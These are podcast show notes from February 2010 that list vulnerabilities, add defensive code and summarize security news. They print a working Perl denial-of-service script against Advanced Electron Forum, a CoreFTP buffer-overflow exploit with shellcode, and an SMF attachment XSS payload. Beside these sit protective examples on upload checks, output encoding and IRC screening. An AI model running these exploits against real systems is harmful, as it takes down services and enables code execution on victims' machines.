Your daily source of Pwnage, Policy and Politics.

Episode 60 – The Pain Train


InfoSec Podcast Episode 60 for February 3, 2010. This podcast is our contribution back to the community, in which we discuss vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com is putting on their Data Recovery Class February 9th to 13th. The class is in Atlanta and there are still seats available! Please email smoulton at nicservices dot com for seating information.

MyHardDriveDied.com will be in Orlando at SANS 2010, March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

MHDD Data Recovery Class, April 12th to 16th in Washington, DC. Go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

Vulnerabilities of Interest:

  1. Advanced Electron Forum (AEF) is subject to multiple search denial-of-service vulnerabilities. The exploit below loops search POSTs carrying oversized numeric parameters at the forum until it stops responding, so a single unauthenticated client can exhaust the server. Version 1.0.8 is affected; other versions may be too. Exploit code is available:
    #!/usr/bin/perl
    # Advanced Electron Forum (AEF) 1.0.8 - multiple search DoS
    use strict;
    use warnings;
    use IO::Socket;

    print q{
    ##################################################
    # The Advanced Electron Forum Multiple Search DOS #
    # Tested on AEF 1.0.8                             #
    # Created By Ashiyane Digital Security Team ! ;)  #
    ##################################################
    };

    print "Forum Host: ";
    my $serv = <STDIN>;
    chomp($serv);
    print "Forum Path: ";          # e.g. /forum/ (with the trailing slash)
    my $path = <STDIN>;
    chomp($path);

    # Crafted search query: oversized numeric parameters; the search term at
    # the end is URL-encoded UTF-8 (Persian for "search").
    my $postit =
        "index.php?act=search&sact=results&allwords=Cair3x&exactphrase=999999"
      . "&atleastone=9999&without=999999&within=-19999999&starter=99999999999999"
      . "&forums%5B%5D=0&showas=199999&search=%D8%AC%D8%B3%D8%AA%D8%AC%D9%88";
    my $lrg = length $postit;

    for (my $i = 0; $i < 9999; $i++) {
        # One connection and one search request per iteration
        my $sock = IO::Socket::INET->new(
            PeerAddr => $serv,
            PeerPort => 80,
            Proto    => "tcp",
        ) or die "\nThe socket can't connect to the desired host, or the host may already be DoSed: $!\n";

        print $sock "POST ${path}index.php?act=search HTTP/1.1\r\n";
        print $sock "Host: $serv\r\n";
        print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
        print $sock "Referer: $serv\r\n";
        print $sock "Accept-Language: en-us\r\n";
        print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
        print $sock "Accept-Encoding: gzip, deflate\r\n";
        print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\r\n";
        print $sock "Connection: Keep-Alive\r\n";
        print $sock "Cache-Control: no-cache\r\n";
        print $sock "Content-Length: $lrg\r\n\r\n";
        print $sock $postit;
        close($sock);

        # Print a "+" for every loop
        syswrite STDOUT, "+";
    }
    print "\nThe forum should be down now. Test it ...\n";

  2. Simple Machines Forum (SMF) is subject to a cross-site scripting vulnerability in attachment handling. The exploit needs no code beyond a text file: write the script into a file and save it with a .jpg extension, for example a "script.jpg" whose contents are <Script>Alert('Xss By Ashiyane (Cair3x)')</Script>, then upload it as an attachment. The file is stored and served back under its claimed name, and a browser that sniffs the content renders the script when the attachment is opened: http://www.sample.com/Smf/attachments/Number/attach_Script_jpg_Hash(script.jpg)
  3. Corel Paint Shop Pro Photo X2 is subject to a heap-based buffer overflow when processing malformed FPX files. Corel Paint Shop Pro Photo X2 Ultimate 12.50 is confirmed vulnerable; older versions are probably affected too but were not checked. When processing certain structures from an FPX file, the application allocates fixed-size (0xC08-byte) heap buffers and copies data from the file into them, but it takes the loop counter for the copy from bytes in the FPX file without verifying that they hold legal values. A large user-controlled count therefore overruns the 0xC08-byte buffer, overwriting the metadata of adjacent heap chunks and possibly allowing arbitrary code execution (though this does not seem easy). Proof-of-concept code is available.
  4. Cisco Secure Desktop XSS / JavaScript injection. The Cisco Secure Desktop web application does not sufficiently verify that a POST request was actually submitted by the user it claims to come from, and the content of a POST field is not encoded when it is used in HTML output, so an attacker who controls that content can insert JavaScript. Furthermore, the same POST value is used in 'binary/mainv.js' as input to an 'eval()' call while building the 'start.html' page, so an attacker can inject arbitrary code, with no restrictions, which executes in the context of that 'eval()'. Proof-of-concept code is available.
  5. Oracle Solaris is subject to a UCODE_GET_VERSION IOCTL kernel NULL pointer dereference, reported as a local privilege escalation vulnerability; the impact actually described is a system panic. Solaris 10 with patch 127128-11 and without 143913-01 (x86), and OpenSolaris builds snv_69 through snv_133 (x86), are affected. The vulnerability allows a local unprivileged user to panic a Solaris x86 Intel-based system (32-bit or 64-bit mode) through a NULL pointer dereference; the ability to panic a system is a form of denial of service (DoS). The issue is triggered by sending a specially crafted IOCTL request (the microcode driver's UCODE_GET_VERSION) to the kernel.
  6. CoreFTP version 2.1 (build 1637) is subject to a stack buffer overflow in the SSH password field, which the PoC author describes as a universal BOF. The vulnerability is triggered by convincing a user to submit an overly long string as the SSH password (the PoC writes that string to overflowpassword.txt for pasting in). The buffer is unchecked, resulting in control of the instruction pointer and allowing arbitrary code injection. PoC code is available:
    #!/usr/bin/python
    # CoreFTP v2.1 b1637 (password field) universal BOF exploit - Corelan Team
    print "|------------------------------------------------------------------|"
    print "| __ __ |"
    print "| _________ ________ / /___ _____ / /____ ____ ________ |"
    print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __`__ \ |"
    print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / // / |"
    print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_//_/ |"
    print "| |"
    print "| http://www.corelan.be:8800 |"
    print "| security@corelan.be |"
    print "| |"
    print "|-------------------------------------------------[ EIP Hunters]--|"
    print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF exploit"

    # Encoded shellcode; adjacent string literals are concatenated by Python
    sc = (
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
    "\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
    "\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
    "\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
    "\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
    "\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
    "\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
    "\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
    "\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
    "\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
    "\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
    "\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
    "\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
    "\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
    "\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
    "\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
    "\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
    "\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
    "\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
    "\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
    "\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
    "\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
    "\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
    "\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
    "\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
    "\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
    "\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
    "\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
    "\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
    "\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
    "\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
    "\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
    "\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
    "\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
    "\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
    "\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
    "\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
    "\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
    "\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
    "\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
    print "[+] Creating buffer string in overflowpassword.txt."

    stuff = "\x41" * 145                     # 'A' == inc ecx: harmless sled the backward jump lands in
    stuff += "\x90" * 5                      # NOPs
    stuff += sc                              # shellcode
    stuff += "\x41" * (1008-len(stuff)-5)    # pad so the next instruction sits at offset 1003
    stuff += "\xe9\x7c\xfc\xff\xff"          # jmp rel32 (-900) back into the sled: Lets fly
    stuff += "\xeb\xf9\x90\x90"              # jmp rel8 (-7) onto the jmp above: Jump back
    stuff += "\x0b\x0b\x27\x00"              # partial/null overwrite of the saved return address

    f1 = open('overflowpassword.txt', 'w')
    f1.write(stuff)
    f1.close()
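
Item 2 works because the uploaded "image" is stored under its claimed name and later handed to a browser that sniffs the content and renders the script. The check below is an added example, not SMF's own code: it verifies that an uploaded file's leading bytes carry the signature its extension promises, refuses content a sniffer would treat as HTML, and builds the response headers that stop sniffing when a stored attachment is served. The function names and the two sample payloads are constructed for this illustration.

```python
# Added example (not SMF's own code): reject renamed text files at upload
# time and serve stored attachments in a way browsers will not sniff.

MAGIC = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Tags that trigger HTML sniffing in common browsers; matched case-insensitively
MARKUP_TAGS = (b"<script", b"<html", b"<body", b"<iframe", b"<svg", b"<!doctype")


def extension_of(filename: str) -> str:
    """Lower-cased final extension, or '' when there is none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def is_genuine_image(filename: str, data: bytes) -> bool:
    """True only if the leading bytes carry the signature the extension promises.
    A text file renamed to .jpg (the attack in item 2) fails here."""
    sigs = MAGIC.get(extension_of(filename))
    return bool(sigs) and any(data.startswith(s) for s in sigs)


def looks_like_markup(data: bytes) -> bool:
    """Second line of defence: content a browser's sniffer would treat as HTML."""
    head = data[:512].lower()
    return any(tag in head for tag in MARKUP_TAGS)


def accept_upload(filename: str, data: bytes) -> bool:
    """Upload policy: a real image for its extension, and no markup in the head."""
    return is_genuine_image(filename, data) and not looks_like_markup(data)


def attachment_headers(stored_name: str, content_type: str) -> dict:
    """Headers for serving a stored attachment: force a download, forbid MIME
    sniffing, and use the server's own content type, never the uploader's."""
    safe_name = stored_name.replace('"', "").replace("\r", "").replace("\n", "")
    return {
        "Content-Type": content_type,
        "Content-Disposition": 'attachment; filename="%s"' % safe_name,
        "X-Content-Type-Options": "nosniff",
    }


# Constructed samples: the item-2 payload and a minimal JFIF header
XSS_JPG = b"<Script>Alert('Xss By Ashiyane (Cair3x)')</Script>"
REAL_JPG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32

if __name__ == "__main__":
    for name, data in (("script.jpg", XSS_JPG), ("photo.jpg", REAL_JPG)):
        print(name, "accepted" if accept_upload(name, data) else "rejected")
    print(attachment_headers("photo.jpg", "image/jpeg"))
```

The signature check alone is not enough on its own: a file can start with a valid JPEG header and still carry HTML further in, which is why the serving side also sets nosniff and forces a download rather than trusting the stored name.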

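Item 4 combines two output-encoding failures: a POST value dropped into HTML unencoded, and the same value spliced into source text that is passed to eval(). The example below is added here and is not Cisco's code; 'msg' stands in for the POST field the advisory describes, and the page fragments, function names and attacker value are invented for illustration. It shows the flawed pattern beside the corrected one, which encodes for each context separately and assigns the value instead of evaluating it.

```python
import html
import json

# Added example, not Cisco's code.  'msg' stands in for the POST field the
# advisory describes; the page fragments below are invented for illustration.


def render_unsafe(msg: str) -> str:
    """Mirrors the two flaws in item 4: the raw POST value lands in HTML
    unencoded, and the same value is spliced into a string that is eval()'d."""
    return ('<div id="status">%s</div>\n'
            "<script>eval('var status = \"%s\";');</script>" % (msg, msg))


def js_string_literal(value: str) -> str:
    """Encode a value for a JavaScript string context: JSON escapes quotes,
    backslashes and control characters; '</' is broken up so the literal can
    never close the surrounding <script> element."""
    return json.dumps(value).replace("</", "<\\/")


def render_safe(msg: str) -> str:
    """HTML-escape for the HTML context, JSON-encode for the script context,
    and assign the value directly instead of building source for eval()."""
    return ('<div id="status">%s</div>\n'
            "<script>var status = %s;</script>"
            % (html.escape(msg, quote=True), js_string_literal(msg)))


def script_elements(page: str) -> int:
    """Count literal '</script>' closers in a page: one is the template's own;
    any more means injected markup ended the script block early."""
    return page.lower().count("</script>")


def decodes_back(value: str) -> bool:
    """The encoded literal must still carry the original value to the browser."""
    return json.loads(js_string_literal(value)) == value


# Constructed attacker value: ends the JS string, runs code, then closes <script>
PAYLOAD = '"; alert(document.cookie); //</script><img src=x onerror=alert(1)>'

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
```

The first half of the advisory, the missing check that the user actually submitted the POST, is a separate fix (a per-session anti-forgery token) that this example does not cover.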

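The three tail fragments of the item-6 PoC are easy to get wrong by a byte, so the added example below (not part of Corelan's exploit) rebuilds the same layout with placeholder bytes in place of the shellcode, decodes the two relative jumps the way the CPU would, and reports where execution lands. The 717-byte placeholder matches the length of the encoded shellcode above; the offsets and the return-address bytes are the PoC's. It assumes, as the PoC does, that the return address 0x00270b0b redirects execution to the short jump at offset 1008, with the trailing NUL of the password string supplying the high byte.

```python
import struct

# Added example, not part of the Corelan PoC: rebuild the buffer layout and
# decode the jump chain at its tail.  SHELLCODE is a placeholder of the same
# length (717 bytes) as the encoded payload in the PoC.

SLED_LEN = 145                     # 'A' == inc ecx: harmless single-byte filler
NOP_LEN = 5
SHELLCODE = b"\xcc" * 717          # placeholder, same length as the PoC's shellcode
EIP_OFFSET = 1012                  # offset of the saved return address on the stack


def build_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Same construction as the PoC, with the shellcode swapped for a placeholder."""
    buf = b"\x41" * SLED_LEN
    buf += b"\x90" * NOP_LEN
    buf += shellcode
    buf += b"\x41" * (1008 - len(buf) - 5)   # pad so the next 5 bytes sit at offset 1003
    buf += b"\xe9\x7c\xfc\xff\xff"           # jmp rel32: "Lets fly"
    buf += b"\xeb\xf9\x90\x90"               # jmp rel8: "Jump back"
    buf += b"\x0b\x0b\x27\x00"               # partial/null overwrite of EIP
    return buf


def decode_jump(buf: bytes, off: int):
    """Target offset of a jmp rel8 (EB) or jmp rel32 (E9) at 'off', else None.
    Displacements are relative to the end of the instruction, as the CPU does it."""
    if buf[off] == 0xEB:
        return off + 2 + struct.unpack_from("<b", buf, off + 1)[0]
    if buf[off] == 0xE9:
        return off + 5 + struct.unpack_from("<i", buf, off + 1)[0]
    return None


def trace_jumps(buf: bytes, start: int) -> list:
    """Follow chained jumps from 'start'; stop at the first non-jump byte,
    an out-of-buffer target, or a loop.  Returns the offsets visited."""
    path = [start]
    while True:
        nxt = decode_jump(buf, path[-1])
        if nxt is None or nxt in path or not 0 <= nxt < len(buf):
            return path
        path.append(nxt)


def overwritten_eip(buf: bytes) -> int:
    """The little-endian value that lands in the saved return address."""
    return struct.unpack_from("<I", buf, EIP_OFFSET)[0]


def landing_region(buf: bytes, off: int) -> str:
    """Which part of the layout an offset falls in."""
    if off < SLED_LEN:
        return "inc-ecx sled"
    if off < SLED_LEN + NOP_LEN:
        return "nop sled"
    if off < SLED_LEN + NOP_LEN + len(SHELLCODE):
        return "shellcode"
    return "padding/tail"


if __name__ == "__main__":
    buf = build_payload()
    path = trace_jumps(buf, 1008)       # assumed: 0x00270b0b lands on the jmp rel8
    print("EIP <- 0x%08x" % overwritten_eip(buf))
    print("jump chain:", path, "->", landing_region(buf, path[-1]))
```

The chain is 1008 (jmp -7) to 1003 (jmp -900) to offset 108: the CPU then executes 37 inc ecx and 5 nop before reaching the shellcode, so the leading A's are the sled the backward jump relies on, not just padding. Because both jumps sit at fixed offsets, the landing point stays at 108 whatever the shellcode length, but a payload longer than 853 bytes would push the jumps past offset 1003 and break the chain.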
News Items of Interest:

News item 1: http://lists.vmware.com/pipermail/security-announce/2010/000078.html

VMware has issued an advisory on vulnerabilities in the Java Runtime Environment (JRE) bundled with its products, covering ESX, Server, VirtualCenter and vCenter. According to the company, several of the 47 JRE flaws can be used by an attacker to compromise a system.

VMware vCenter 4.0, VMware Server 2.0, VMware ESX 4.0, 3.5 and 3.0.3, VirtualCenter 2.5 and 2.0.2 and VMware VMA 4.0 are all affected. An update for VirtualCenter 2.5 has been released; security updates for the other products are still pending.
News item 2: http://blog.freenode.net/2010/01/javascript-spam/
Underscoring a little-known web vulnerability, hackers are exploiting a weakness in the Mozilla Firefox browser to wreak havoc on Freenode and other networks that cater to users of internet relay chat.

Using a piece of JavaScript embedded in a web link, the hackers force users of the open-source browser to join IRC networks and flood channels with diatribes that include the same internet address. As IRC users with Firefox follow the link, their browsers are also forced to spam the channels, giving the attack a viral quality that has caused major disruptions for almost a month.

The malicious javascript exploits a feature that allows Firefox to send data over a variety of ports that aren’t related to web browsing. By relaying the scripts over port 6667, users who click on the link automatically connect to the IRC server and begin spewing a tirade of offensive text and links. The attack doesn’t work with Internet Explorer or Apple Safari, but “might” work with other browsers.

IRC networks such as Efnet and OFTC have managed to block the attacks, but at time of writing Freenode operators were still struggling to repel them.
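
What reaches the IRC server in this attack is a complete HTTP request: a request line, headers, a blank line, and then the IRC commands in the POST body. An ircd that ignores lines it does not understand skips the headers and obeys the body. The example below is added here and is not freenode's or any ircd's code: it contrasts that lenient parsing with a front-end check that refuses a connection whose first line is an HTTP request, which is one mitigation IRC daemons adopted. The sample session is constructed.

```python
# Added example, not freenode's or any ircd's code.  The first line a browser
# sends when tricked into "posting" to port 6667 is an HTTP request line; a
# genuine IRC client starts with NICK/USER/PASS/CAP.  Rejecting on that line
# is one mitigation IRC daemons adopted; the sample session is constructed.

HTTP_METHODS = (b"GET", b"POST", b"PUT", b"HEAD", b"OPTIONS", b"CONNECT", b"DELETE")
IRC_COMMANDS = {b"NICK", b"USER", b"JOIN", b"PRIVMSG", b"NOTICE", b"PASS", b"CAP"}


def lines_of(stream: bytes) -> list:
    """Split a raw byte stream into non-empty lines, tolerating CRLF or LF."""
    return [ln.rstrip(b"\r") for ln in stream.split(b"\n") if ln.strip()]


def is_http_request_line(line: bytes) -> bool:
    """'<METHOD> <target> HTTP/1.x' is never a legitimate IRC command."""
    parts = line.split()
    return (len(parts) == 3 and parts[0] in HTTP_METHODS
            and parts[2].startswith(b"HTTP/1."))


def lenient_commands(stream: bytes) -> list:
    """What a forgiving ircd does: skip unknown lines (the HTTP headers) and
    act on the IRC commands that arrive in the POST body."""
    cmds = []
    for ln in lines_of(stream):
        verb = ln.split(b" ", 1)[0].upper()
        if verb in IRC_COMMANDS:
            cmds.append(ln)
    return cmds


def screen_connection(stream: bytes):
    """Hardened front: decide on the first line before any command is parsed.
    Returns ('reject', reason) or ('accept', commands)."""
    lines = lines_of(stream)
    if not lines:
        return ("reject", "empty")
    if is_http_request_line(lines[0]):
        return ("reject", "HTTP request on IRC port")
    return ("accept", lenient_commands(stream))


# Constructed sample: what a victim's browser emits after following the link
BROWSER_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: irc.example.net:6667\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 105\r\n"
    b"\r\n"
    b"NICK victim1234\r\n"
    b"USER victim 0 * :victim\r\n"
    b"JOIN #target\r\n"
    b"PRIVMSG #target :visit http://spam.example/link\r\n"
)

# Constructed sample: a genuine client's opening lines
REAL_CLIENT = b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #chat\r\n"

if __name__ == "__main__":
    print("lenient ircd would run:", lenient_commands(BROWSER_POST))
    print("screened browser post:", screen_connection(BROWSER_POST))
    print("screened real client: ", screen_connection(REAL_CLIENT))
```

The browser-side counterpart is to stop the request from leaving at all, which is why the article notes that Internet Explorer and Safari, which refuse connections to port 6667, are not usable for this attack.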

News item 3: http://www.krebsonsecurity.com/wp-content/uploads/2010/01/CCE01052010_00000.pdf and http://www.krebsonsecurity.com/wp-content/uploads/2010/01/sharedhopereport.pdf
When a computer virus infection at a business allows thieves to steal tens of thousands of dollars from the company’s commercial banking account, banks typically don’t reimburse the victim company. But the truth is, most banks make that decision on a case-by-case basis. Take, for example, the case of two Umpqua Bank customers in Vancouver, Wash., both of which suffered major financial losses last year after compromises at employee computers allowed thieves to access their accounts remotely.

Clark County businessman Elie Kassab watched more than $81,000 vanish from his Battle Ground Cinema bank account in March. Umpqua was alerted to the thefts and traced the money to several East Coast accounts, but was only able to recover $18,193.53 before the rest disappeared offshore.

Similarly, Shared Hope International, a Vancouver-based nonprofit for impoverished women, lost $179,000 in May when three unauthorized transfers swept the funds away to a Russian bank. That money was not recovered.

In both cases, Umpqua confirmed the thefts, and identified security breaches in its clients’ computer systems that it says allowed the thieves to access their accounts remotely. Umpqua has since refunded the entire amount lost by Shared Hope but is still battling with Kassab over who’s to blame for the fraudulent transfers.

According to The Columbian, both companies were refunded the lost money, but the bank demanded Kassab give the money back after its forensic examiner reportedly found a number of virus infections on his PC. The bank never asked for the $179,000 back from the other victim organization, which was founded by former U.S. Congresswoman Linda Smith (R).

News item 4: http://news.bbc.co.uk/2/hi/technology/8488751.stm
Google has begun to phase out support for Internet Explorer 6, the browser identified as the weak link in a cyber attack on the search engine.  The firm said from 1 March some of its services, such as Google Docs, would not work “properly” with the browser.  It recommended individuals and firms upgrade “as soon as possible”.